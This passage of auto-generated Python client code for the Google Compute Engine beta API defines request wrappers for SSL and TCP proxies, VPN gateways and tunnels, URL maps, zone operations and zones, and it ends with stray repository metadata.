supports_download=False,
)
def SetSslCertificates(self, request, global_params=None):
"""Changes SslCertificates for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetSslCertificatesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslCertificates')
return self._RunMethod(
config, request, global_params=global_params)
SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setSslCertificates',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslCertificates',
request_field=u'targetSslProxiesSetSslCertificatesRequest',
request_type_name=u'ComputeTargetSslProxiesSetSslCertificatesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetSslPolicy(self, request, global_params=None):
"""Sets the SSL policy for TargetSslProxy. The SSL policy specifies the server-side support for SSL features. This affects connections between clients and the SSL proxy load balancer. They do not affect the connection between the load balancer and the backends.
Args:
request: (ComputeTargetSslProxiesSetSslPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetSslPolicy.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setSslPolicy',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslPolicy',
request_field=u'sslPolicyReference',
request_type_name=u'ComputeTargetSslProxiesSetSslPolicyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetSslProxiesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetSslProxiesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetTcpProxiesService(base_api.BaseApiService):
"""Service class for the targetTcpProxies resource."""
_NAME = u'targetTcpProxies'
def __init__(self, client):
super(ComputeBeta.TargetTcpProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetTcpProxy resource.
Args:
request: (ComputeTargetTcpProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetTcpProxies.delete',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetTcpProxy resource. Get a list of available target TCP proxies by making a list() request.
Args:
request: (ComputeTargetTcpProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetTcpProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetTcpProxies.get',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesGetRequest',
response_type_name=u'TargetTcpProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetTcpProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetTcpProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetTcpProxies',
request_field=u'targetTcpProxy',
request_type_name=u'ComputeTargetTcpProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetTcpProxy resources available to the specified project.
Args:
request: (ComputeTargetTcpProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetTcpProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetTcpProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetTcpProxies',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesListRequest',
response_type_name=u'TargetTcpProxyList',
supports_download=False,
)
def SetBackendService(self, request, global_params=None):
"""Changes the BackendService for TargetTcpProxy.
Args:
request: (ComputeTargetTcpProxiesSetBackendServiceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackendService')
return self._RunMethod(
config, request, global_params=global_params)
SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.setBackendService',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setBackendService',
request_field=u'targetTcpProxiesSetBackendServiceRequest',
request_type_name=u'ComputeTargetTcpProxiesSetBackendServiceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetProxyHeader(self, request, global_params=None):
"""Changes the ProxyHeaderType for TargetTcpProxy.
Args:
request: (ComputeTargetTcpProxiesSetProxyHeaderRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetProxyHeader')
return self._RunMethod(
config, request, global_params=global_params)
SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.setProxyHeader',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setProxyHeader',
request_field=u'targetTcpProxiesSetProxyHeaderRequest',
request_type_name=u'ComputeTargetTcpProxiesSetProxyHeaderRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetVpnGatewaysService(base_api.BaseApiService):
"""Service class for the targetVpnGateways resource."""
_NAME = u'targetVpnGateways'
def __init__(self, client):
super(ComputeBeta.TargetVpnGatewaysService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target VPN gateways.
Args:
request: (ComputeTargetVpnGatewaysAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGatewayAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetVpnGateways',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysAggregatedListRequest',
response_type_name=u'TargetVpnGatewayAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified target VPN gateway.
Args:
request: (ComputeTargetVpnGatewaysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetVpnGateways.delete',
ordered_params=[u'project', u'region', u'targetVpnGateway'],
path_params=[u'project', u'region', u'targetVpnGateway'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified target VPN gateway. Get a list of available target VPN gateways by making a list() request.
Args:
request: (ComputeTargetVpnGatewaysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGateway) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.get',
ordered_params=[u'project', u'region', u'targetVpnGateway'],
path_params=[u'project', u'region', u'targetVpnGateway'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysGetRequest',
response_type_name=u'TargetVpnGateway',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a target VPN gateway in the specified project and region using the data included in the request.
Args:
request: (ComputeTargetVpnGatewaysInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field=u'targetVpnGateway',
request_type_name=u'ComputeTargetVpnGatewaysInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of target VPN gateways available to the specified project and region.
Args:
request: (ComputeTargetVpnGatewaysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGatewayList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysListRequest',
response_type_name=u'TargetVpnGatewayList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a TargetVpnGateway. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeTargetVpnGatewaysSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeTargetVpnGatewaysSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetVpnGatewaysTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetVpnGatewaysTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class UrlMapsService(base_api.BaseApiService):
"""Service class for the urlMaps resource."""
_NAME = u'urlMaps'
def __init__(self, client):
super(ComputeBeta.UrlMapsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified UrlMap resource.
Args:
request: (ComputeUrlMapsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.urlMaps.delete',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified UrlMap resource. Get a list of available URL maps by making a list() request.
Args:
request: (ComputeUrlMapsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMap) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.get',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsGetRequest',
response_type_name=u'UrlMap',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a UrlMap resource in the specified project using the data included in the request.
Args:
request: (ComputeUrlMapsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps',
request_field=u'urlMap',
request_type_name=u'ComputeUrlMapsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def InvalidateCache(self, request, global_params=None):
"""Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.
Args:
request: (ComputeUrlMapsInvalidateCacheRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('InvalidateCache')
return self._RunMethod(
config, request, global_params=global_params)
InvalidateCache.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.invalidateCache',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/invalidateCache',
request_field=u'cacheInvalidationRule',
request_type_name=u'ComputeUrlMapsInvalidateCacheRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of UrlMap resources available to the specified project.
Args:
request: (ComputeUrlMapsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/urlMaps',
request_field='',
request_type_name=u'ComputeUrlMapsListRequest',
response_type_name=u'UrlMapList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeUrlMapsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.urlMaps.patch',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeUrlMapsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeUrlMapsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified UrlMap resource with the data included in the request.
Args:
request: (ComputeUrlMapsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.urlMaps.update',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Validate(self, request, global_params=None):
"""Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.
Args:
request: (ComputeUrlMapsValidateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapsValidateResponse) The response message.
"""
config = self.GetMethodConfig('Validate')
return self._RunMethod(
config, request, global_params=global_params)
Validate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.validate',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/validate',
request_field=u'urlMapsValidateRequest',
request_type_name=u'ComputeUrlMapsValidateRequest',
response_type_name=u'UrlMapsValidateResponse',
supports_download=False,
)
class VpnTunnelsService(base_api.BaseApiService):
"""Service class for the vpnTunnels resource."""
_NAME = u'vpnTunnels'
def __init__(self, client):
super(ComputeBeta.VpnTunnelsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of VPN tunnels.
Args:
request: (ComputeVpnTunnelsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsAggregatedListRequest',
response_type_name=u'VpnTunnelAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified VpnTunnel resource.
Args:
request: (ComputeVpnTunnelsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.vpnTunnels.delete',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified VpnTunnel resource. Get a list of available VPN tunnels by making a list() request.
Args:
request: (ComputeVpnTunnelsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnel) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.get',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsGetRequest',
response_type_name=u'VpnTunnel',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a VpnTunnel resource in the specified project and region using the data included in the request.
Args:
request: (ComputeVpnTunnelsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field=u'vpnTunnel',
request_type_name=u'ComputeVpnTunnelsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of VpnTunnel resources contained in the specified project and region.
Args:
request: (ComputeVpnTunnelsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsListRequest',
response_type_name=u'VpnTunnelList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a VpnTunnel. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeVpnTunnelsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeVpnTunnelsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeVpnTunnelsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeVpnTunnelsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class ZoneOperationsService(base_api.BaseApiService):
"""Service class for the zoneOperations resource."""
_NAME = u'zoneOperations'
def __init__(self, client):
super(ComputeBeta.ZoneOperationsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeZoneOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.zoneOperations.delete',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsDeleteRequest',
response_type_name=u'ComputeZoneOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.get',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified zone.
Args:
request: (ComputeZoneOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/operations',
request_field='',
request_type_name=u'ComputeZoneOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class ZonesService(base_api.BaseApiService):
"""Service class for the zones resource."""
_NAME = u'zones'
def __init__(self, client):
super(ComputeBeta.ZonesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified Zone resource. Get a list of available zones by making a list() request.
Args:
request: (ComputeZonesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Zone) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.get',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}',
request_field='',
request_type_name=u'ComputeZonesGetRequest',
response_type_name=u'Zone',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Zone resources available to the specified project.
Args:
request: (ComputeZonesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ZoneList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones',
request_field='',
request_type_name=u'ComputeZonesListRequest',
response_type_name=u'ZoneList',
supports_download=False,
)
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
bff6d26590f067bd15ad04ee687e8f3bf1027a7a | 6d6d82ce7835fd8fca1aa12f775a75f4d7901f0f | /makedoc.py | 1e2c1ef75b934eb9702f4faf493c766702d71fb0 | [
"Apache-2.0"
